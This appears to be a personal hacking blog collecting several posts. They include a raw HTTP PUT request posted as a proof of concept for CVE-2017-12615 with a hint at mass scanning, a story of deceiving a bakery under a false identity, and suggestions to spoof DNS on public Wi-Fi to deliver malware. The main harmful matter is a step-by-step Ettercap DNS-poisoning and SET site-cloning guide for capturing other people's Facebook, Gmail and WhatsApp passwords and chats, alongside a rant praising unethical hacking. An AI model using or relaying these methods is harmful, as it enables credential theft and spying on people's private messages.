PoC CVE-2017-12615

Hum… I don’t know, an script using a lot of ranges on Dreamhosts, Bluehosts, OVH, Rackspace… ouuu yep! the life is sad.

PUT /tumamamemima.jsp/
Host: www.quierounhot-cacke.com:80
Connection: close
Content-Length: 85

<% out.write(“

[+] JSP upload successfully.

“); %>


Please, help us!

Yesterday Mexico City suffered a terrible earthquake, there a lot of people trapped into the buildings, explosions, there are a lot of zones without energy, water, and other services.

There are some accounts where you can help, I donated to “Los topos”, a team created in 1985.  You can support where you prefer, but help.

Los Topos Mexicanos
Santander 92000709294
CLABE 014180920007092942
Paypal: donativos@brigada-rescate-topos.org

I will donate all my earnings derived from the bug bounties this month. We need your support, please if you’re a bug bounty hunter, donate a part of your bounties to help my city. All the bad persons, like us, have at least one thing in our hearts that motivate us to offer everything in the world. Mexico City is one of mine.

The bread attack

One of the most valuable skills in the hacking world is the social engineering… in simple words is the ability to deceive persons, or as I say “chamaquear”, well, here is the story.

(Dialogues are in spanish, because is so complex translate them to english)

I have a friend who loves the bread of dead, this is a bread of dead:

This bread is cooked on October and November for the Day of the death, one of the most important dates at Mexico. But some places start to sell the bread on September.

We live at Mexicali, but I’m from Mexico City, and in my city bakeries are more traditionals, and there are bakeries which create the bests breads of the dead. But, due to these breads are so special, the bakeries just sell them from October 290th to November 3th… so, in September, how can I get some breads?… hum..

Well.. here is the story:

- Hola
- Si, Rosetta, buenas tardes
- Que tal, llamo porque quiero preguntar si ya tienen pan de muerto. He escuchado que es muy bueno el suyo porque esta hecho con romero
- Si, nuestra cocina esta premiada entre las 15 mejores del mundo; sin embargo lamento decirle que únicamente vendemos pan de muerto del día 29 de Octubre hasta agotar existencias
- Hum.. entiendo... ¿hay forma de que usted me pueda hacer un pedido especial?
- No creo realmente, a menos que fuese un volumen muy grande
- Hum.. entiendo.. mire, deje me presento, me llamo Judas Gerardo, y básicamente estoy de viaje en la ciudad porque tengo un restaurante en Mexicali, y bueno, nosotros no tenemos comida muy tradicional, así que mi foco en llevar la comida más tradicional del país al norte para que sea conocida. Y para día de muertos tengo planeado llevar pan de muerto de las panaderías más tradicionales, porque allá hace tanta falta que incluso la gente se atreve a comer pan de súper mercado
- Oh Dios
- Exacto, entonces estoy iniciando este nuevo proyecto, y bueno encontré que Rosetta vendé el pan de muerto calificado en 2016, y me gustaría llevar unas muestras a mis socios en Mexicali para que lo prueben y en caso de que les agrede hace un pedido mucho mayor.
- ¿Ha visto otras opciones?
- Tengo que ser sincero, si; estoy evaluando varias panaderías de las 10 mejor calificadas, por ahora llevo dos Sucreicacoa y la Pilarika; no depende únicamente de mi elegir el que más nos guste, pero bueno al fina mi intención que llevar los mejores sabores del país hacia el norte. 
- Es un proyecto muy ambicioso, y dígame ¿cuantas muestras necesita? 
- Yo creo que unas 10. obviamente las pagaría y en caso que ustedes me lo pidan puedo pagar un costo mayor. Obviamente le preveo que si ustedes fuesen los elegidos, haríamos un pedido de al menos unas 10, 000 unidades. 
- Excelente, mire, me gusta su idea, déjeme le pasó al área de finanzas para poder llegar a un acuerdo

Well, this is first part… I accorded with the bakery 10 special breads for $4, 000 MX (around $200 dlls) which so expensive, but the person told me that the high price was because… actually I don’t know, but.. hum.. well… see the next part.

- Hola, vengo a recoger un pedido de 10 panes que encargue
- Buenos días Judas, soy Elena, la cheff y dueña  del restaurante, me comentaron acerca de su proyecto de llevar nuestro pan a Mexicali
- Si
- Tienes un ligero acento muy cantadito, pero en el fondo suenas normal
- Si, yo soy chilango; pero bueno, me asocie con unos amigos en esta locura y bueno... la verdad es que yo no voy más allá de hacer unos huevos revueltos, pero me encargo de las relaciones comerciales
- Ven Judas, siéntate conmigo, los panes los tenemos, pero quiero que pruebes uno recién salido del horno para que veas su sabor y textura; y te invito un café delicioso que nos traen de Chiapas
- Ouuu... hum.. ok

Well I passed 3 hours talking about Mexicali, about food, about hacking (yeap.. I told her I’m a security guy).. and after that I got my 10 breads for free… so, my friend will taste the best breads from Mexico City, prepared specially for her by one of the most recognizzed cheffs in the world. I hope she really likes the breads because was so complicated got them.. but well, I’m an expert social engineer 😉

Ouuu.. well, from the 10 breads, just survived 2.. .for her; coff.. coff..

Yes I know.. this is not a technical post, but a good skills on social engineering some times are most important than the technical skills.

Chan, chan, charraaaa…

The magic of the DNS spoofing

After read the post related to intercept Facebook’s chats, I talked with a friend about other more “interesting” things that you can do with this simple attack.

Some months ago at Mexico were reveled attacks to press supposed by the government, using SMS to infect cellphones.. well, I think a SMS is not necessary, just perform a DNS attack to a captive portal in a Starbucks, a hotel, a company.. and redirect with a simple button the user to the malware…

Doubts?… 🙂

Well… you can also apply a DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. it’s needed to know what are writing others about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The most easy way is performing a DNS poisoning, using Ettercap. Open the the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options; sniff the traffic using wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clon the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.

Don’t judge me…

The new hackers… “ethical” hackers

[…] it focuses on how to become an ethical hacker. Mastering the art of hacking can be an extremely powerful skill that we hope will be used for good. The most successful hackers know how to navigate the thin line between right and wrong while hacking. Many people can break things, and even try to make a quick buck doing so. But imagine you can make the Internet safer, work with amazing companies around the world, and even get paid along the way. Your talent has the potential of keeping billions of people and their data secure. That is what we hope you aspire to.[…] – Pete Yaworski


Where went on the real hackers?… ethical hackers?… fuck Pete… have you sniffed the network at your school?, changed your notes?, stolen passwords?… good people always lose… hackers need to be unethical… fuck off with the world. If you can do something, do it.. weak people suffer, and it is ok.

I hate “ethical” hackers.

How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But, how the incredible, invencible, fabulous vendetta could be hacked?…

Well it was easy… actually very easy…

I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were at the same IP range.

She used Ettercap to perform a DNS spoofing to www.facebook.com, pointing to her computer, and in her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPN’s to work, so it’s normal to me be disconnected from my accounts. I entered to the Facebook’s messenger, entered my credentials and… pwned!


And that’s all… you don’t fall me very well que we say!